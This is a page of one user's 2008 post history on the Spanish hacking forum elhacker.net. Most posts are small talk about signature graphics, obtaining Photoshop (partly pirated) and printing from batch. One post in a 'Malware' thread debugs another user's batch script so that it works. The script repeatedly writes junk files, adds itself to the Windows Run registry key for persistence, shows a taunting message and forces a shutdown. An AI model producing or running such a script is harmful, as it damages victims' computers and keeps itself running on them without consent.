elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: 1 ... 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 [18] 19 20 21 22 23 24 25 26
171  Programación / Scripting / Re: Malware en: 4 Febrero 2008, 12:18 pm
Un par de cosas para decir:

echo off>Bucler.bat

Esto no es necesario  :P

echo echo %random%>A %var%.txt>>Bucler.bat
echo echo %random%>A %var%.txt>>Bucler.bat
echo echo %random%>A %var%.txt>>Bucler.bat
echo echo %random%>A %var%.txt>>Bucler.bat
echo echo %random%>A %var%.txt>>Bucler.bat
echo echo %random%>A %var%.txt>>Bucler.bat
echo echo %random%>A %var%.txt>>Bucler.bat
echo echo %random%>A %var%.txt>>Bucler.bat
echo echo %random%>A %var%.txt>>Bucler.bat
echo echo %random%>A %var%.txt>>Bucler.bat

A esto le tenes que agregar el ^, puesto qeu sino batch toma el primer > como el rediccionador y no como un caracter a escribir, me entiendes? Ademas si escribes variables tendran que ir con doble %

Te qudaria asi:

echo echo %random%^>A %%var%.txt>>Bucler.bat
echo echo %random%^>A %%var%.txt>>Bucler.bat
echo echo %random%^>A %%var%.txt>>Bucler.bat
echo echo %random%^>A %%var%.txt>>Bucler.bat
echo echo %random%^>A %%var%.txt>>Bucler.bat
echo echo %random%^>A %%var%.txt>>Bucler.bat
echo echo %random%^>A %%var%.txt>>Bucler.bat
echo echo %random%^>A %%var%.txt>>Bucler.bat
echo echo %random%^>A %%var%.txt>>Bucler.bat
echo echo %random%^>A %%var%.txt>>Bucler.bat

Y por ultimo, pequeño detalle al final del code:

Código:
msg * Te lo dejo en tu PC
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v"windows" /d "C:\WINDOWS\system32\Bucler.bat"
tsshutdown -s -f -c "HACKER EN TU PC" -05

A ese msg agregale /w que lo que hace es que el programa no se siga ejecutando hasta que no ponga aceptar/cierre el cartelito.

Código:
msg /w * Te lo dejo en tu PC
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v"windows" /d "C:\WINDOWS\system32\Bucler.bat"
tsshutdown -s -f -c "HACKER EN TU PC" -05

Ahora si te deberia funcionar, un saludo  ;)
172  Media / Diseño Gráfico / Re: Que le parece mi firma ? en: 3 Febrero 2008, 01:13 am
Se , mañana me voy a comprar el photoshop ( trucho  ;D ) y me voy a leer un par de tutoriales, aver si ya puedo hacerme la firma
173  Programación / Scripting / Re: dir >prn (Batch) en: 2 Febrero 2008, 19:32 pm
no no no...

lo que yo quiero es que atravez dle commando dir > prn te salga el mensaje "hola" por la impresora : que la impresora imprima la palabra hola mediante una orden del cmd. Como seria el codigo?

Agrego:

Para que entiendan mejor:

http://foro.elhacker.net/index.php/topic,18148.0.html
174  Programación / Scripting / dir >prn (Batch) en: 2 Febrero 2008, 18:37 pm
si yo quiero que por la impresora salga el mensaje hola, osea que imprima hola, como seria?

Muchas gracias!
175  Media / Diseño Gráfico / Re: Que le parece mi firma ? en: 2 Febrero 2008, 13:37 pm
jajaja  ;D
176  Media / Diseño Gráfico / Re: Que le parece mi firma ? en: 2 Febrero 2008, 03:43 am
ya van 3 que les gusta ^^

ahora me descargo el photoshop y empiezo a leer unos tutoriales que voy a terminar mañana xq ya me tengo q ir a dormir  ;D

voy a ver eso de cambiar las letras dle medio ;)

PD: Para descargar el adobe photoshop CS 3 de esa pagina, me pide rellenar un formulario y no me lo descarga.... aparte dice que es la version de prueba y yo quiero saber si se puede cnseguir la version completa
177  Media / Diseño Gráfico / Re: Que le parece mi firma ? en: 1 Febrero 2008, 21:49 pm
muchissimas gracias a 741852 por sus criticas constructivas  ;D

en cuanto a lo del photoshop, alguna guia para iniciarse rapido y la pagina de la cual se puede descargar la ultima version del programa completo estaria muuuuuuuuuuuuuuuuuy agradecido  ;)
178  Media / Diseño Gráfico / Re: Que le parece mi firma ? en: 1 Febrero 2008, 21:06 pm
bueno, muchas gracias al que dijo que le gusto  ;D

aunque la hice con flash, xq no tengo photoshop y no se como usarlo  :rolleyes:
179  Media / Diseño Gráfico / Re: Que le parece mi firma ? en: 31 Enero 2008, 21:14 pm
ue significa rebacana?

 ;D
180  Media / Diseño Gráfico / Re: Que le parece mi firma ? en: 31 Enero 2008, 20:52 pm
personalmente me gusta mas con el efecto alpha de flash, negro claro sobre negro oscuro queda bien para mi. En cuanto a la imagen, es asi, me refiero a que es borrosa y yo creo que le queda bien con respecto al tema.
Páginas: 1 ... 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 [18] 19 20 21 22 23 24 25 26
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines